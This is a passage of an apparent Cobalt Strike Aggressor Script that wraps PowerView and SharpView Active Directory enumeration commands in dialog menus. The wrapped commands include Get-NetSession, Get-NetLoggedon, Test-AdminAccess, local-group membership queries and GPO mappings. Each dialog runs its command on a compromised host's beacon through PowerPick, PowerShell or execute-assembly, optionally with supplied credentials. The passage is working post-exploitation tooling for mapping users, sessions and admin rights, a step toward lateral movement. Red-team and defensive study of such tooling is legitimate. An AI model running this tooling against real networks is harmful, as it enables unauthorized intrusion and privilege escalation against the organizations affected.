    drow_checkbox($dialog, 'ResolveMembersToSIDs', 'ResolveMembersToSIDs');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomaingpouserlocalgroupmapping{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainGPOUserLocalGroupMapping", %(execmethod => "PowerPick", Identity => "", LocalGroup => "", Domain => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaingpouserlocalgroupmapping()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainGPOUserLocalGroupMapping via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainGPOUserLocalGroupMapping'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainGPOUserLocalGroupMapping via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainGPOUserLocalGroupMapping'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainGPOUserLocalGroupMapping via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainGPOUserLocalGroupMapping'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation. If no user/group is specified, all discoverable mappings are returned");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'LocalGroup', 'LocalGroup');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomaingpocomputerlocalgroupmapping{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainGPOComputerLocalGroupMapping", %(execmethod => "PowerPick", ComputerIdentity => "", OUIdentity => "", LocalGroup => "", Domain => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimity => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaingpocomputerlocalgroupmapping()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainGPOComputerLocalGroupMapping via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainGPOComputerLocalGroupMapping'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainGPOComputerLocalGroupMapping via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainGPOComputerLocalGroupMapping'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainGPOComputerLocalGroupMapping via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainGPOComputerLocalGroupMapping'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation");
    drow_text($dialog, 'ComputerIdentity', 'ComputerIdentity');
    drow_text($dialog, 'OUIdentity', 'OUIdentity');
    drow_text($dialog, 'LocalGroup', 'LocalGroup');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainpolicy{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainPolicyData", %(execmethod => "PowerPick", Domain => "", Policy => "", Server => "", ServerTimeLimit => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainpolicydata()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainPolicy via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainPolicyData'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainPolicyData via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainPolicy'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainPolicyData via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainPolicyData'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Policy', 'Policy');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

#---------------------------------
# Computer Enumeration Functions
#---------------------------------
sub getnetlocalgroup{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-NetLocalGroup", %(execmethod => "PowerPick", ComputerName => "", Method => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetnetlocalgroup()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-NetLocalGroup via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-NetLocalGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-NetLocalGroup via PowerShell');
            bpowershell($bid, ''.$creds.'Get-NetLocalGroup'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-NetLocalGroup via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-NetLocalGroup'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates the local groups on the local (or remote) machine");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Method', 'Method');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getnetlocalgroupmember{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-NetLocalGroupMember", %(execmethod => "PowerPick", ComputerName => "", GroupName => "", Method => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetnetlocalgroupmember()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-NetLocalGroupMember via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-NetLocalGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-NetLocalGroupMember via PowerShell');
            bpowershell($bid, ''.$creds.'Get-NetLocalGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-NetLocalGroupMember via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-NetLocalGroupMember'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates members of a specific local group on the local (or remote) machine");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'GroupName', 'GroupName');
    drow_text($dialog, 'Method', 'Method');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getnetshare{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-NetShare", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetnetshare()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-NetShare via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-NetShare'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-NetShare via PowerShell');
            bpowershell($bid, ''.$creds.'Get-NetShare'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-NetShare via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-NetShare'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns open shares on the local (or a remote) machine");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getnetloggedon{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-NetLoggedon", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetnetloggedon()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-NetLoggedon via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-NetLoggedon'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-NetLoggedon via PowerShell');
            bpowershell($bid, ''.$creds.'Get-NetLoggedon'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-NetLoggedon via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-NetLoggedon'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns users logged on the local (or a remote) machine. Note: administrative rights needed for newer Windows OSes");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getnetsession{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-NetSession", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetnesession()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-NetSession via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-NetSession'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-NetSession via PowerShell');
            bpowershell($bid, ''.$creds.'Get-NetSession'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-NetSession via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-NetSession'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns session information for the local (or a remote) machine");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getregloggedon{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-RegLoggedOn", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetregloggedon()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-RegLoggedOn via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-RegLoggedOn'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-RegLoggedOn via PowerShell');
            bpowershell($bid, ''.$creds.'Get-RegLoggedOn'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-RegLoggedOn via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-RegLoggedOn'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getnetrdpsession{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-NetRDPSession", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetnetrdpsession()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-NetRDPSession via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-NetRDPSession'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-NetRDPSession via PowerShell');
            bpowershell($bid, ''.$creds.'Get-NetRDPSession'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-NetRDPSession via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-NetRDPSession'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns remote desktop/session information for the local (or a remote) machine. Note: only members of the Administrators or Account Operators local group can successfully execute this functionality on a remote target");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub testadminaccess{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Test-AdminAccess", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helptestadminaccess()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Test-AdminAccess via PowerPick');
            bpowerpick($bid, ''.$creds.'Test-AdminAccess'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Test-AdminAccess via PowerShell');
            bpowershell($bid, ''.$creds.'Test-AdminAccess'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Test-AdminAccess via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Test-AdminAccess'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Tests if the current user has administrative access to the local (or a remote) machine.");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getnetcomputersitename{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-NetComputerSiteName", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetnetcomputersitename()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-NetComputerSiteName via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-NetComputerSiteName'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-NetComputerSiteName via PowerShell');
            bpowershell($bid, ''.$creds.'Get-NetComputerSiteName'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-NetComputerSiteName via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-NetComputerSiteName'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns the AD site where the local (or a remote) machine resides");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getwmiregproxy{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-WMIRegProxy", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetwmiregproxy()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-WMIRegProxy via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-WMIRegProxy'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-WMIRegProxy via PowerShell');
            bpowershell($bid, ''.$creds.'Get-WMIRegProxy'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-WMIRegProxy via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-WMIRegProxy'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates the proxy server and WPAD conents for the current user");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getwmireglastloggedon{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-WMIRegLastLoggedOn", %(execmethod => "PowerPick", ComputerName => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetwmireglastloggedon()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
